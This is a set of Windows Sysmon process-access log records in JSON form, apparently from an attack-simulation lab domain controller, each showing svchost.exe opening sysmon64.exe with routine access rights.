{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1466,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.281\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.281","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1467,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.281\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.281","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1468,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.281\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.281","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1469,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.281\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.281","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1470,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.281\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.281","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1471,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.281\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.281","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1472,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.281\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.281","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1473,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.281\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.281","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
